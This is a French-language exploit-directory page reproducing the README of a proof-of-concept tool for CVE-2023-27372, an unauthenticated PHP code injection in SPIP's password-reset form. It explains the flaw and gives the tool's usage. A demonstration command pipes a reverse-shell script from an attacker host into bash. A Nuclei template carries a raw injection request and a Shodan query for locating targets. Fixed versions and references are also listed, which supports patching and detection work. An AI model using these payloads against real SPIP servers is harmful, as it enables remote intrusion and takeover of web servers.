Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-27372 — SPIP avant 4.2.1 permet l'exécution de code à distance via les valeurs de formulaire dans la zone publique car la sérialisation est mal gérée. Les versions corrigées sont 3.2.18, 4.0.10, 4.1.8 et 4.2.1. | Kitploit
Outils/GitHubGitHub/nuts7/cve-2023-27372
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubnuts7/cve-2023-27372

CVE-2023-27372

SPIP avant 4.2.1 permet l'exécution de code à distance via les valeurs de formulaire dans la zone publique car la sérialisation est mal gérée. Les versions corrigées sont 3.2.18, 4.0.10, 4.1.8 et 4.2.1.

Voir le dépôt
698il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Bannière


CVE-2023-27372

Les versions de SPIP antérieures à 4.2.1 permettent l'exécution de code à distance via les valeurs de formulaire dans la zone publique en raison d'une mauvaise gestion de la sérialisation. Les versions corrigées sont 3.2.18, 4.0.10, 4.1.8 et 4.2.1. Ce PoC exploite une injection de code PHP dans SPIP. La vulnérabilité réside dans le paramètre oubli et permet à un utilisateur non authentifié d'exécuter des commandes arbitraires avec les privilèges de l'utilisateur Web. Les branches 3.2, 4.0, 4.1 et 4.2 sont concernées. Les versions vulnérables sont <3.2.18, <4.0.10, <4.1.18 et <4.2.1.

Explication de la vulnérabilité

Cette vulnérabilité exploite 2 bugs pour abuser d'une fonction d'assainissement de variable trop permissive afin d'injecter du code PHP :

  • Utilisation d'une balise dangereuse (#ENV**) dans le modèle de la fonctionnalité de réinitialisation de mot de passe :
root@kitploit:~
<!-- File : /squelettes-dist/formulaires/oubli.html -->
<input[ (#HTML5|?{type="email" class="text email" autofocus="autofocus" required="required",type="text" class="text"})] name='oubli' id='oubli' value="#ENV**{oubli}" autocapitalize="off" autocorrect="off" />
  • La mauvaise regex est utilisée dans la fonction protege_champ(), car aucun traitement n'est effectué sur les chaînes sérialisées :
root@kitploit:~
<!-- File : /ecrire/balise/formulaire_.php -->
if ((preg_match(",^[abis]:\d+[:;],", $texte) and @unserialize($texte) != false) or is_null($texte)) {
    return $texte; // $texte = $_POST['oubli']

Il est possible d'injecter une chaîne PHP sérialisée contenant du code PHP dans la variable $_POST['oubli'] lors de la réinitialisation d'un mot de passe sur le point d'accès /spip.php?page=spip_pass afin d'obtenir une RCE sur le serveur.

Exemple manuel :

Capture d'écran Burp

Capture d'écran Phpinfo

Utilisation

root@kitploit:~
❯ ./CVE-2023-27372.py -h
usage: CVE-2023-27372.py [-h] -u URL -c COMMAND [-v]

Poc of CVE-2023-27372 SPIP < 4.2.1 - Remote Code Execution by nuts7

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     SPIP application base URL
  -c COMMAND, --command COMMAND
                        Command to execute
  -v, --verbose         Verbose mode. (default: False)

Démonstration

root@kitploit:~
./CVE-2023-27372.py -u https://spip.local.com -c 'curl https://attacker.server/revshell.sh|bash' -v

Comment configurer l'environnement de test ?

Dockerfile :

root@kitploit:~
FROM ubuntu:20.04 as base
ARG DEBIAN_FRONTEND=noninteractive
RUN apt-get update && apt-get install -y \
		php \
		php-xml \
		php-zip \
		php-sqlite3 \
		unzip
ADD https://files.spip.net/spip/archives/spip-v4.2.0.zip /tmp/
RUN unzip /tmp/spip-v4.2.0.zip -d /var/www/
RUN cd /var/www/ && php -S 0.0.0.0:8000

Modèle Nuclei

Écran Nuclei

root@kitploit:~
id: CVE-2023-27372

info:
  name: SPIP - Remote Command Execution
  author: DhiyaneshDK,nuts7
  severity: critical
  description: |
    SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.
  reference:
    - https://packetstormsecurity.com/files/171921/SPIP-Remote-Command-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27372
    - https://github.com/nuts7/CVE-2023-27372
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-27372
  metadata:
    max-request: 1
    shodan-query: html:"spip.php?page=backend"
    verified: "true"
  tags: cve,cve2023,spip,rce

http:
  - raw:
      - |
        GET /spip.php?page=spip_pass HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /spip.php?page=spip_pass HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        page=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s:19:"<?php phpinfo(); ?>";

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "PHP Extension"
          - "PHP Version"
          - "<!DOCTYPE html"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrf
        group: 1
        internal: true
        part: body_1
        regex:
          - "name='formulaire_action_args'[^>]*value='([^']*)'"

      - type: regex
        part: body_2
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'

Références

  • https://nvd.nist.gov/vuln/detail/CVE-2023-27372
  • https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-2-1-SPIP-4-1-8-SPIP-4-0-10-et.html
  • https://git.spip.net/spip/spip/commit/5aedf49b89415a4df3eb775eee3801a2b4b88266
  • https://git.spip.net/spip/spip/commit/96fbeb38711c6706e62457f2b732a652a04a409d
  • https://www.debian.org/security/2023/dsa-5367
  • http://packetstormsecurity.com/files/171921/SPIP-Remote-Command-Execution.html
  • https://therealcoiffeur.com/c11010
  • https://github.com/rapid7/metasploit-framework/pull/17711/files
Télécharger l’outil